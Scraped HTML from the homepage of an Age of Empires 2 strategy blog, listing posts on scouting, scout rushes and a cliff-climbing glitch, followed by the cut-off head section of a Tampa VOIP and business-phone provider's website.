href="https://ageofnotes.com/resolve-issues/glitch-let-climb-cliffs-age-empires-2-video-proof/" title="A Glitch Let You Climb Cliffs in Age of Empires 2 With A Video Proof" class="post-image post-image-left"> <div class="featured-thumbnail"><img width="622" height="320" src="https://ageofnotes.com/wp-content/uploads/2018/10/Villager-climbing-cliff-622x320.jpg" class="attachment-authority-featuredfull size-authority-featuredfull wp-post-image" alt="A Glitch Let You Climb Cliffs in Age of Empires 2" title="" /></div> </a> <div class="front-view-content"> Just 2 days ago (October, 28 2018) while I was practicing a strategy versus an AI, I ran into a weird glitch in Age of Empires 2 “UserPatch 1.5&nbsp;&hellip; </div> <div class="article-footer"> <span class="thecomment"><span class="thenumber">0</span> <a href="https://ageofnotes.com/resolve-issues/glitch-let-climb-cliffs-age-empires-2-video-proof/#respond" itemprop="interactionCount">Comments</a></span> <span class="leave-reply"><a href="https://ageofnotes.com/resolve-issues/glitch-let-climb-cliffs-age-empires-2-video-proof/#respond">Leave Your Response</a></span> </div> </article> <article class="latestPost excerpt index-2"> <header> <h2 class="title front-view-title" itemprop="headline"><a href="https://ageofnotes.com/strategies/scout-rush-build-order-secrets-step-step/" title="A Scout Rush Build Order and Secrets In a step by step">A Scout Rush Build Order and Secrets In a step by step</a></h2> <div class="post-info"> <span class="theauthor"><i class="fa fa-check"></i> <span><a href="https://ageofnotes.com/author/gregstein/" title="Posts by GregStein" rel="author">GregStein</a></span></span> <span class="thetime date updated"><i class="fa fa-clock-o"></i> <span>October 29, 2018</span></span> <span class="thecategory"><i class="fa fa-tags"></i> <a href="https://ageofnotes.com/category/strategies/" title="View all posts in Strategies">Strategies</a></span> <span class="thecomment"><i class="fa fa-comments"></i> <a href="https://ageofnotes.com/strategies/scout-rush-build-order-secrets-step-step/#comments" itemprop="interactionCount">1 Comment</a></span> </div> </header> <a href="https://ageofnotes.com/strategies/scout-rush-build-order-secrets-step-step/" title="A Scout Rush Build Order and Secrets In a step by step" class="post-image post-image-left"> <div class="featured-thumbnail"><img width="622" height="320" src="https://ageofnotes.com/wp-content/uploads/2018/10/scout-rush-secrets-in-age-of-empires-2-622x320.jpg" class="attachment-authority-featuredfull size-authority-featuredfull wp-post-image" alt="" title="" /></div> </a> <div class="front-view-content"> Are you new to a scout rush? Looking to improve it? This guide will not only teach how to scout rush properly but also unveil the deepest dark secrets&nbsp;&hellip; </div> <div class="article-footer"> <span class="thecomment"><span class="thenumber">1</span> <a href="https://ageofnotes.com/strategies/scout-rush-build-order-secrets-step-step/#comments" itemprop="interactionCount">Comments</a></span> <span class="leave-reply"><a href="https://ageofnotes.com/strategies/scout-rush-build-order-secrets-step-step/#comments">Leave Your Response</a></span> </div> </article> <article class="latestPost excerpt index-2 last"> <header> <h2 class="title front-view-title" itemprop="headline"><a href="https://ageofnotes.com/tutorials/play-without-boars-and-sheep/" title="How To Play Without Boars And Sheep">How To Play Without Boars And Sheep</a></h2> <div class="post-info"> <span class="theauthor"><i class="fa fa-check"></i> <span><a href="https://ageofnotes.com/author/gregstein/" title="Posts by GregStein" rel="author">GregStein</a></span></span> <span class="thetime date updated"><i class="fa fa-clock-o"></i> <span>October 23, 2018</span></span> <span class="thecategory"><i class="fa fa-tags"></i> <a href="https://ageofnotes.com/category/tutorials/" title="View all posts in Tutorials">Tutorials</a></span> <span class="thecomment"><i class="fa fa-comments"></i> <a href="https://ageofnotes.com/tutorials/play-without-boars-and-sheep/#respond" itemprop="interactionCount">No Comments</a></span> </div> </header> <a href="https://ageofnotes.com/tutorials/play-without-boars-and-sheep/" title="How To Play Without Boars And Sheep" class="post-image post-image-left"> <div class="featured-thumbnail"><img width="622" height="320" src="https://ageofnotes.com/wp-content/uploads/2018/10/How-To-Play-Without-Boars-And-Sheep-622x320.jpg" class="attachment-authority-featuredfull size-authority-featuredfull wp-post-image" alt="How To Play Without Boars And Sheep" title="" /></div> </a> <div class="front-view-content"> Some may argue that stealing boars and sheep early on is unfair while some would say “It’s part of the game”. When I was noob I personally used to&nbsp;&hellip; </div> <div class="article-footer"> <span class="thecomment"><span class="thenumber">0</span> <a href="https://ageofnotes.com/tutorials/play-without-boars-and-sheep/#respond" itemprop="interactionCount">Comments</a></span> <span class="leave-reply"><a href="https://ageofnotes.com/tutorials/play-without-boars-and-sheep/#respond">Leave Your Response</a></span> </div> </article> <article class="latestPost excerpt index-2"> <header> <h2 class="title front-view-title" itemprop="headline"><a href="https://ageofnotes.com/strategies/9-tricks-age-of-empires-2/" title="9 Tricks You Probably Didn&#8217;t Know They Exist in Age of Empires 2">9 Tricks You Probably Didn&#8217;t Know They Exist in Age of Empires 2</a></h2> <div class="post-info"> <span class="theauthor"><i class="fa fa-check"></i> <span><a href="https://ageofnotes.com/author/gregstein/" title="Posts by GregStein" rel="author">GregStein</a></span></span> <span class="thetime date updated"><i class="fa fa-clock-o"></i> <span>December 3, 2017</span></span> <span class="thecategory"><i class="fa fa-tags"></i> <a href="https://ageofnotes.com/category/strategies/" title="View all posts in Strategies">Strategies</a></span> <span class="thecomment"><i class="fa fa-comments"></i> <a href="https://ageofnotes.com/strategies/9-tricks-age-of-empires-2/#comments" itemprop="interactionCount">4 Comments</a></span> </div> </header> <a href="https://ageofnotes.com/strategies/9-tricks-age-of-empires-2/" title="9 Tricks You Probably Didn&#8217;t Know They Exist in Age of Empires 2" class="post-image post-image-left"> <div class="featured-thumbnail"><img width="622" height="320" src="https://ageofnotes.com/wp-content/uploads/2017/12/9-Tricks-You-Probably-Didnt-Know-They-Exist-in-Age-of-Empires-2-622x320.jpg" class="attachment-authority-featuredfull size-authority-featuredfull wp-post-image" alt="9 Tricks You Probably Didn&#039;t Know They Exist in Age of Empires 2" title="" /></div> </a> <div class="front-view-content"> No matter how many hours you spent on playing Age of Empires 2. It just never ceases to be more intriguing, game after game. The amount of fun AOE2&nbsp;&hellip; </div> <div class="article-footer"> <span class="thecomment"><span class="thenumber">4</span> <a href="https://ageofnotes.com/strategies/9-tricks-age-of-empires-2/#comments" itemprop="interactionCount">Comments</a></span> <span class="leave-reply"><a href="https://ageofnotes.com/strategies/9-tricks-age-of-empires-2/#comments">Leave Your Response</a></span> </div> </article> <article class="latestPost excerpt index-2"> <header> <h2 class="title front-view-title" itemprop="headline"><a href="https://ageofnotes.com/resolve-issues/age-empires-2-max-performance-windows-10/" title="Age of empires 2 Max Performance on Windows 10">Age of empires 2 Max Performance on Windows 10</a></h2> <div class="post-info"> <span class="theauthor"><i class="fa fa-check"></i> <span><a href="https://ageofnotes.com/author/gregstein/" title="Posts by GregStein" rel="author">GregStein</a></span></span> <span class="thetime date updated"><i class="fa fa-clock-o"></i> <span>November 23, 2017</span></span> <span class="thecategory"><i class="fa fa-tags"></i> <a href="https://ageofnotes.com/category/resolve-issues/" title="View all posts in Resolve Issues">Resolve Issues</a></span> <span class="thecomment"><i class="fa fa-comments"></i> <a href="https://ageofnotes.com/resolve-issues/age-empires-2-max-performance-windows-10/#comments" itemprop="interactionCount">4 Comments</a></span> </div> </header> <a href="https://ageofnotes.com/resolve-issues/age-empires-2-max-performance-windows-10/" title="Age of empires 2 Max Performance on Windows 10" class="post-image post-image-left"> <div class="featured-thumbnail"><img width="622" height="320" src="https://ageofnotes.com/wp-content/uploads/2017/11/age-empires-2-max-performance-windows-10-622x320.jpg" class="attachment-authority-featuredfull size-authority-featuredfull wp-post-image" alt="Age of empires 2 Max Performance on Windows 10" title="" /></div> </a> <div class="front-view-content"> Throughout this guide, I will help you maximize the performance of age of empires 2 on windows 10. This will also help fix random and constant freezes, mouse lag&nbsp;&hellip; </div> <div class="article-footer"> <span class="thecomment"><span class="thenumber">4</span> <a href="https://ageofnotes.com/resolve-issues/age-empires-2-max-performance-windows-10/#comments" itemprop="interactionCount">Comments</a></span> <span class="leave-reply"><a href="https://ageofnotes.com/resolve-issues/age-empires-2-max-performance-windows-10/#comments">Leave Your Response</a></span> </div> </article> <article class="latestPost excerpt index-2 last"> <header> <h2 class="title front-view-title" itemprop="headline"><a href="https://ageofnotes.com/beginners/step-step-scouting-beginners-age-empires-2/" title="Step By Step Scouting For Beginners in Age of Empires 2">Step By Step Scouting For Beginners in Age of Empires 2</a></h2> <div class="post-info"> <span class="theauthor"><i class="fa fa-check"></i> <span><a href="https://ageofnotes.com/author/gregstein/" title="Posts by GregStein" rel="author">GregStein</a></span></span> <span class="thetime date updated"><i class="fa fa-clock-o"></i> <span>November 22, 2017</span></span> <span class="thecategory"><i class="fa fa-tags"></i> <a href="https://ageofnotes.com/category/beginners/" title="View all posts in Beginners">Beginners</a></span> <span class="thecomment"><i class="fa fa-comments"></i> <a href="https://ageofnotes.com/beginners/step-step-scouting-beginners-age-empires-2/#comments" itemprop="interactionCount">1 Comment</a></span> </div> </header> <a href="https://ageofnotes.com/beginners/step-step-scouting-beginners-age-empires-2/" title="Step By Step Scouting For Beginners in Age of Empires 2" class="post-image post-image-left"> <div class="featured-thumbnail"><img width="622" height="320" src="https://ageofnotes.com/wp-content/uploads/2017/11/step-by-step-scouting-beginner-aoe2-622x320.jpg" class="attachment-authority-featuredfull size-authority-featuredfull wp-post-image" alt="Step By Step Scouting For Beginners in Age of Empires 2" title="" /></div> </a> <div class="front-view-content"> At the start of every game, you usually get 3 villagers and a scout Except (Mayans 4 villagers, Chinese 6 villagers) In this example, I am playing as Mongols. By the&nbsp;&hellip; </div> <div class="article-footer"> <span class="thecomment"><span class="thenumber">1</span> <a href="https://ageofnotes.com/beginners/step-step-scouting-beginners-age-empires-2/#comments" itemprop="interactionCount">Comments</a></span> <span class="leave-reply"><a href="https://ageofnotes.com/beginners/step-step-scouting-beginners-age-empires-2/#comments">Leave Your Response</a></span> </div> </article> <article class="latestPost excerpt index-2"> <header> <h2 class="title front-view-title" itemprop="headline"><a href="https://ageofnotes.com/tutorials/scout-age-empires-2/" title="3 Effective Ways of Scouting in Age Of Empires 2">3 Effective Ways of Scouting in Age Of Empires 2</a></h2> <div class="post-info"> <span class="theauthor"><i class="fa fa-check"></i> <span><a href="https://ageofnotes.com/author/gregstein/" title="Posts by GregStein" rel="author">GregStein</a></span></span> <span class="thetime date updated"><i class="fa fa-clock-o"></i> <span>November 22, 2017</span></span> <span class="thecategory"><i class="fa fa-tags"></i> <a href="https://ageofnotes.com/category/tutorials/" title="View all posts in Tutorials">Tutorials</a></span> <span class="thecomment"><i class="fa fa-comments"></i> <a href="https://ageofnotes.com/tutorials/scout-age-empires-2/#comments" itemprop="interactionCount">4 Comments</a></span> </div> </header> <a href="https://ageofnotes.com/tutorials/scout-age-empires-2/" title="3 Effective Ways of Scouting in Age Of Empires 2" class="post-image post-image-left"> <div class="featured-thumbnail"><img width="622" height="320" src="https://ageofnotes.com/wp-content/uploads/2017/11/scout-dying-to-tc-1-622x320.jpg" class="attachment-authority-featuredfull size-authority-featuredfull wp-post-image" alt="3 Effective Ways of Scouting in Age Of Empires 2" title="" /></div> </a> <div class="front-view-content"> Scouting is significantly critical in Age of Empires 2. I am not only speaking about beginners. Even average to decent players between 15++ and 18++ (Voobly ELO) still do&nbsp;&hellip; </div> <div class="article-footer"> <span class="thecomment"><span class="thenumber">4</span> <a href="https://ageofnotes.com/tutorials/scout-age-empires-2/#comments" itemprop="interactionCount">Comments</a></span> <span class="leave-reply"><a href="https://ageofnotes.com/tutorials/scout-age-empires-2/#comments">Leave Your Response</a></span> </div> </article> <nav class="navigation pagination" role="navigation"> <h2 class="screen-reader-text">Posts navigation</h2> <div class="nav-links"><span aria-current='page' class='page-numbers current'>1</span> <a class='page-numbers' href='https://ageofnotes.com/page/2/'>2</a> <a class="next page-numbers" href="https://ageofnotes.com/page/2/">Next</a></div> </nav> </div> </div> <aside id="sidebar" class="sidebar c-4-12" role="complementary" itemscope itemtype="http://schema.org/WPSideBar"> <div class="widget-ads" id="ads"> <div class="block-div"> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- A_Notes_Right --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-0608818284340124" data-ad-slot="4690050753" data-ad-format="auto"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> </div> </div> <div id="recent-posts-2" class="widget widget_recent_entries"> <h3 class="widget-title">Recent Posts</h3> <ul> <li> <a href="https://ageofnotes.com/beginners/5-reasons-why-you-keep-losing-in-age-of-empires-2/">5 Reasons Why You Keep Losing In Age of Empires 2</a> </li> <li> <a href="https://ageofnotes.com/tutorials/how-to-install-hotkey-profiles-from-pro-players/">How to Install Hotkey Profiles from Pro Players</a> </li> <li> <a href="https://ageofnotes.com/tutorials/setting-age-empires-2-multiplayer-wine-linux-2019/">Setting up Age of Empires 2 Multiplayer For Wine Linux 2019</a> </li> <li> <a href="https://ageofnotes.com/resolve-issues/glitch-let-climb-cliffs-age-empires-2-video-proof/">A Glitch Let You Climb Cliffs in Age of Empires 2 With A Video Proof</a> </li> <li> <a href="https://ageofnotes.com/strategies/scout-rush-build-order-secrets-step-step/">A Scout Rush Build Order and Secrets In a step by step</a> </li> </ul> </div><div id="polls-widget-2" class="widget widget_polls-widget"><h3 class="widget-title">Poll 1</h3><div id="polls-4" class="wp-polls"> <form id="polls_form_4" class="wp-polls-form" action="/index.php" method="post"> <p style="display: none;"><input type="hidden" id="poll_4_nonce" name="wp-polls-nonce" value="0cb619e62b" /></p> <p style="display: none;"><input type="hidden" name="poll_id" value="4" /></p> <p style="text-align: center;"><strong>Did you know that a Korean Mangonel has 1 minimum range instead of 3?</strong></p><div id="polls-4-ans" class="wp-polls-ans"><ul class="wp-polls-ul"> <li><input type="radio" id="poll-answer-12" name="poll_4" value="12" /> <label for="poll-answer-12">Yes</label></li> <li><input type="radio" id="poll-answer-13" name="poll_4" value="13" /> <label for="poll-answer-13">No</label></li> </ul><p style="text-align: center;"><input type="button" name="vote" value=" Vote " class="Buttons" onclick="poll_vote(4);" /></p><p style="text-align: center;"><a href="#ViewPollResults" onclick="poll_result(4); return false;" title="View Results Of This Poll">View Results</a></p></div> </form> </div> <div id="polls-4-loading" class="wp-polls-loading"><img src="https://ageofnotes.com/wp-content/plugins/wp-polls/images/loading.gif" width="16" height="16" alt="Loading ..." title="Loading ..." class="wp-polls-image" />&nbsp;Loading ...</div> </div><div id="polls-widget-3" class="widget widget_polls-widget"><h3 class="widget-title">Poll 2</h3><div id="polls-5" class="wp-polls"> <form id="polls_form_5" class="wp-polls-form" action="/index.php" method="post"> <p style="display: none;"><input type="hidden" id="poll_5_nonce" name="wp-polls-nonce" value="d449ad1c7a" /></p> <p style="display: none;"><input type="hidden" name="poll_id" value="5" /></p> <p style="text-align: center;"><strong>With a Malians ally, researching ballistics only takes 33 seconds instead of 60s.</strong></p><div id="polls-5-ans" class="wp-polls-ans"><ul class="wp-polls-ul"> <li><input type="radio" id="poll-answer-14" name="poll_5" value="14" /> <label for="poll-answer-14">I didn't know that. Thanks</label></li> <li><input type="radio" id="poll-answer-15" name="poll_5" value="15" /> <label for="poll-answer-15">I know.</label></li> </ul><p style="text-align: center;"><input type="button" name="vote" value=" Vote " class="Buttons" onclick="poll_vote(5);" /></p><p style="text-align: center;"><a href="#ViewPollResults" onclick="poll_result(5); return false;" title="View Results Of This Poll">View Results</a></p></div> </form> </div> <div id="polls-5-loading" class="wp-polls-loading"><img src="https://ageofnotes.com/wp-content/plugins/wp-polls/images/loading.gif" width="16" height="16" alt="Loading ..." title="Loading ..." class="wp-polls-image" />&nbsp;Loading ...</div> </div><div id="categories-2" class="widget widget_categories"><h3 class="widget-title">Categories</h3> <ul> <li class="cat-item cat-item-3"><a href="https://ageofnotes.com/category/beginners/" title="age of empires 2 beginners guides on how to get started. Exclusive step by step tutorials, strategies, and gameplay analysis.">Beginners</a> </li> <li class="cat-item cat-item-4"><a href="https://ageofnotes.com/category/resolve-issues/">Resolve Issues</a> </li> <li class="cat-item cat-item-5"><a href="https://ageofnotes.com/category/strategies/">Strategies</a> </li> <li class="cat-item cat-item-2"><a href="https://ageofnotes.com/category/tutorials/">Tutorials</a> </li> </ul> </div><div id="tp_twitch_widget-2" class="widget widget_tp_twitch_widget"><h3 class="widget-title">Live Streams (AoE2)</h3><div class="tp-twitch"> <div class="tp-twitch-streams tp-twitch-streams--widget tp-twitch-streams--style-white" > <div class="tp-twitch-stream tp-twitch-stream--live"> <div class="tp-twitch-stream__header"> <a class="tp-twitch-stream__thumbnail-link" href="https://www.twitch.tv/moonfaller/" target="_blank" rel="nofollow"> <img class="tp-twitch-stream__thumbnail" src="https://static-cdn.jtvnw.net/jtv_user_pictures/f4514f06-c6e0-4fc8-9c25-a6b7e996fe06-channel_offline_image-1920x1080.png" alt="Twitch stream of Moonfaller" /> </a> </div> <div class="tp-twitch-stream__body"> <span class="tp-twitch-stream__user-avatar"> <a href="https://www.twitch.tv/moonfaller/videos/all" target="_blank" rel="nofollow"> <img class="tp-twitch-stream__avatar" src="https://static-cdn.jtvnw.net/jtv_user_pictures/a78adcc7-35ef-4214-9d52-f41207510451-profile_image-50x50.jpeg" alt="Moonfaller" /> </a> </span> <span class="tp-twitch-stream__title"><a href="https://www.twitch.tv/moonfaller/" target="_blank" rel="nofollow">!sunday </a></span> <span class="tp-twitch-stream__user"> <span class="tp-twitch-icon-user"></span><a href="https://www.twitch.tv/moonfaller/videos/all" target="_blank" rel="nofollow">Moonfaller</a> </span> </div> <div class="tp-twitch-stream__footer"> <span class="tp-twitch-stream__viewer"> <span class="tp-twitch-icon-viewer"></span>76 </span> <span class="tp-twitch-stream__views"> <span class="tp-twitch-icon-views"></span>36,711 </span> </div> </div> <div class="tp-twitch-stream tp-twitch-stream--live"> <div class="tp-twitch-stream__header"> <a class="tp-twitch-stream__thumbnail-link" href="https://www.twitch.tv/octagonald/" target="_blank" rel="nofollow"> <img class="tp-twitch-stream__thumbnail" src="https://static-cdn.jtvnw.net/jtv_user_pictures/63e24a4f-62a4-4682-a75d-223dbebbc9cc-channel_offline_image-1920x1080.png" alt="Twitch stream of OctagonalD" /> </a> </div> <div class="tp-twitch-stream__body"> <span class="tp-twitch-stream__user-avatar"> <a href="https://www.twitch.tv/octagonald/videos/all" target="_blank" rel="nofollow"> <img class="tp-twitch-stream__avatar" src="https://static-cdn.jtvnw.net/jtv_user_pictures/75c3431e-4464-42df-af81-6ae289858f28-profile_image-50x50.png" alt="OctagonalD" /> </a> </span> <span class="tp-twitch-stream__title"><a href="https://www.twitch.tv/octagonald/" target="_blank" rel="nofollow">Selling Out </a></span> <span class="tp-twitch-stream__user"> <span class="tp-twitch-icon-user"></span><a href="https://www.twitch.tv/octagonald/videos/all" target="_blank" rel="nofollow">OctagonalD</a> </span> </div> <div class="tp-twitch-stream__footer"> <span class="tp-twitch-stream__viewer"> <span class="tp-twitch-icon-viewer"></span>14 </span> <span class="tp-twitch-stream__views"> <span class="tp-twitch-icon-views"></span>72,798 </span> </div> </div> <div class="tp-twitch-stream tp-twitch-stream--live"> <div class="tp-twitch-stream__header"> <a class="tp-twitch-stream__thumbnail-link" href="https://www.twitch.tv/oceania_aoe2_tournaments/" target="_blank" rel="nofollow"> <img class="tp-twitch-stream__thumbnail" src="https://static-cdn.jtvnw.net/jtv_user_pictures/2c03861f-7721-4fd8-a926-d88c333baea5-channel_offline_image-1920x1080.png" alt="Twitch stream of Oceania_Aoe2_Tournaments" /> </a> </div> <div class="tp-twitch-stream__body"> <span class="tp-twitch-stream__user-avatar"> <a href="https://www.twitch.tv/oceania_aoe2_tournaments/videos/all" target="_blank" rel="nofollow"> <img class="tp-twitch-stream__avatar" src="https://static-cdn.jtvnw.net/user-default-pictures/0ecbb6c3-fecb-4016-8115-aa467b7c36ed-profile_image-50x50.jpg" alt="Oceania_Aoe2_Tournaments" /> </a> </span> <span class="tp-twitch-stream__title"><a href="https://www.twitch.tv/oceania_aoe2_tournaments/" target="_blank" rel="nofollow">Hotshots of Arabia - Finals Series - Best of 5</a></span> <span class="tp-twitch-stream__user"> <span class="tp-twitch-icon-user"></span><a href="https://www.twitch.tv/oceania_aoe2_tournaments/videos/all" target="_blank" rel="nofollow">Oceania_Aoe2_Tournaments</a> </span> </div> <div class="tp-twitch-stream__footer"> <span class="tp-twitch-stream__viewer"> <span class="tp-twitch-icon-viewer"></span>8 </span> <span class="tp-twitch-stream__views"> <span class="tp-twitch-icon-views"></span>1,445 </span> </div> </div> </div> </div></div></aside><!--#sidebar--> </div><!--#page--> <footer id="site-footer" role="contentinfo" itemscope itemtype="http://schema.org/WPFooter"> <div class="container"> <div class="copyrights"> <!--start copyrights--> <div class="row" id="copyright-note"> <span></span> <span><a href=" https://ageofnotes.com/" title=" Learn and Play Age Of Empires 2 Just Better">Age Of Notes</a> Copyright &copy; 2019. All rights reserved.</span> <div class="to-top"> <div id="footer-nav"> <div class="menu-footer-container"><ul id="menu-footer" class="footer-menu"><li id="menu-item-192" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-192"><a href="http://ageofnotes.com" aria-current="page">Home</a></li> <li id="menu-item-193" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-193"><a href="https://ageofnotes.com/category/beginners/">Beginners</a></li> <li id="menu-item-194" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-194"><a href="https://ageofnotes.com/category/tutorials/">Tutorials</a></li> <li id="menu-item-195" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-195"><a href="https://ageofnotes.com/category/strategies/">Strategies</a></li> <li id="menu-item-196" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-196"><a href="https://ageofnotes.com/privacy-policy/">Privacy Policy</a></li> <li id="menu-item-197" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-197"><a href="https://ageofnotes.com/terms-of-service/">Terms of Service</a></li> <li id="menu-item-198" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-198"><a href="https://ageofnotes.com/contact-us/">Contact</a></li> </ul></div> </div> </div> </div> <!--end copyrights--> </div> </div><!--.container--> </footer><!--#site-footer--> </div><!--.main-container--> <!--start footer code--> <!-- Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-109982216-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-109982216-1'); </script> <!--end footer code--> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/ageofnotes.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"cached":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://ageofnotes.com/wp-content/cache/min/1/b34a86f9a249294cff2f9346c7d8a654.js' data-minify="1"></script> <script type='text/javascript' src='https://ageofnotes.com/wp-content/plugins/tomparisde-twitchtv-widget/public/js/scripts.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var pollsL10n = {"ajax_url":"https:\/\/ageofnotes.com\/wp-admin\/admin-ajax.php","text_wait":"Your last request is still being processed. Please wait a while ...","text_valid":"Please choose a valid poll answer.","text_multiple":"Maximum number of choices allowed: ","show_loading":"1","show_fading":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://ageofnotes.com/wp-content/cache/min/1/749c8248c763242bee2a0be1d20c7630.js' data-minify="1"></script> <script type='text/javascript' async="async" src='https://ageofnotes.com/wp-content/themes/agetips/js/jquery.magnific-popup.min.js'></script> </body> <noscript><link rel="stylesheet" href="//fonts.googleapis.com/css?family=Noto+Serif%3A400%2C400i%2C700%2C700i" /></noscript><noscript><link rel='stylesheet' id='wp-block-library-css' href='https://ageofnotes.com/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /></noscript><noscript><link rel='stylesheet' id='wp-components-css' href='https://ageofnotes.com/wp-includes/css/dist/components/style.min.css' type='text/css' media='all' /></noscript><noscript><link rel='stylesheet' id='wp-block-editor-css' href='https://ageofnotes.com/wp-includes/css/dist/block-editor/style.min.css' type='text/css' media='all' /></noscript><noscript><link rel='stylesheet' id='wp-nux-css' href='https://ageofnotes.com/wp-includes/css/dist/nux/style.min.css' type='text/css' media='all' /></noscript><noscript><link rel='stylesheet' id='wp-editor-css' href='https://ageofnotes.com/wp-includes/css/dist/editor/style.min.css' type='text/css' media='all' /></noscript><noscript><link rel='stylesheet' id='sld_block-cgb-style-css-css' href='https://ageofnotes.com/wp-content/plugins/simple-link-directory/gutenberg/sld-block/dist/blocks.style.build.css' type='text/css' media='all' /></noscript><noscript><link rel='stylesheet' id='contact-form-7-css' href='https://ageofnotes.com/wp-content/plugins/contact-form-7/includes/css/styles.css' type='text/css' media='all' /></noscript><noscript><link rel='stylesheet' id='tp-twitch-style-css' href='https://ageofnotes.com/wp-content/plugins/tomparisde-twitchtv-widget/public/css/styles.min.css' type='text/css' media='all' /></noscript><noscript><link rel='stylesheet' id='wp-polls-css' href='https://ageofnotes.com/wp-content/plugins/wp-polls/polls-css.css' type='text/css' media='all' /></noscript><noscript><link rel='stylesheet' id='wpgeshi-wp-geshi-highlight-css' href='https://ageofnotes.com/wp-content/plugins/wp-geshi-highlight/wp-geshi-highlight.css' type='text/css' media='all' /></noscript><noscript><link rel='stylesheet' id='authority-stylesheet-css' href='https://ageofnotes.com/wp-content/themes/agetips/style.css' type='text/css' media='all' /></noscript><noscript><link rel='stylesheet' id='magnificPopup-css' href='https://ageofnotes.com/wp-content/themes/agetips/css/magnific-popup.css' type='text/css' media='all' /></noscript><noscript><link rel='stylesheet' id='fontawesome-css' href='https://ageofnotes.com/wp-content/themes/agetips/css/font-awesome.min.css' type='text/css' media='all' /></noscript><noscript><link rel='stylesheet' id='responsive-css' href='https://ageofnotes.com/wp-content/themes/agetips/css/responsive.css' type='text/css' media='all' /></noscript></html> <!-- This website is like a Rocket, isn't it? Performance optimized by WP Rocket. Learn more: https://wp-rocket.me - Debug: cached@1558008332 -->
0
<!DOCTYPE html> <html class="no-overflow-y avada-html-layout-wide" lang="en-US" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" prefix="og: http://ogp.me/ns#"> <head> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>Business phone | VOIP | Secure Backup | Dedicated Internet Tampa FL 2018</title> <!-- This site is optimized with the Yoast SEO Premium plugin v3.1 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Pbx-change offers the VOIP, Business phone, and Cloud Collaboration services in Tampa FL, for more details CALL US at 866.400.8585."/> <meta name="robots" content="noodp"/> <link rel="canonical" href="https://www.pbx-change.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Business phone | VOIP | Secure Backup | Dedicated Internet Tampa FL 2018" /> <meta property="og:description" content="Pbx-change offers the VOIP, Business phone, and Cloud Collaboration services in Tampa FL, for more details CALL US at 866.400.8585." /> <meta property="og:url" content="https://www.pbx-change.com/" /> <meta property="og:site_name" content="PBX-Change" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="Pbx-change offers the VOIP, Business phone, and Cloud Collaboration services in Tampa FL, for more details CALL US at 866.400.8585." /> <meta name="twitter:title" content="Business phone | VOIP | Secure Backup | Dedicated Internet Tampa FL 2018" /> <meta property="DC.date.issued" content="2017-08-17T10:09:48-05:00" /> <script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"WebSite","url":"https:\/\/www.pbx-change.com\/","name":"PBX-Change","potentialAction":{"@type":"SearchAction","target":"https:\/\/www.pbx-change.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <!-- / Yoast SEO Premium plugin. --> <link rel='dns-prefetch' href='//supsystic-42d7.kxcdn.com' /> <link rel='dns-prefetch' href='//cdnjs.cloudflare.com' /> <link rel='dns-prefetch' href='//maxcdn.bootstrapcdn.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="PBX-Change &raquo; Feed" href="https://www.pbx-change.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="PBX-Change &raquo; Comments Feed" href="https://www.pbx-change.com/comments/feed/" /> <meta property="og:title" content="Avada Home"/> <meta property="og:type" content="article"/> <meta property="og:url" content="https://www.pbx-change.com/"/> <meta property="og:site_name" content="PBX-Change"/> <meta property="og:description" content="Providing Voice &amp; Internet Solutions PBX-Change understands the challenges faced by businesses in today’s economic climate. We empower our clients with Fortune 500 voice, data, and IT solutions, allowing them to maximize their potential while staying within their budget. PBX-Change is a local; family owned and operated Internet and Telephony Service Provider"/> <meta property="og:image" content="https://www.pbx-change.com/wp-content/uploads/2019/04/PBXandTBFiberLogo-1.png"/> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.pbx-change.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return 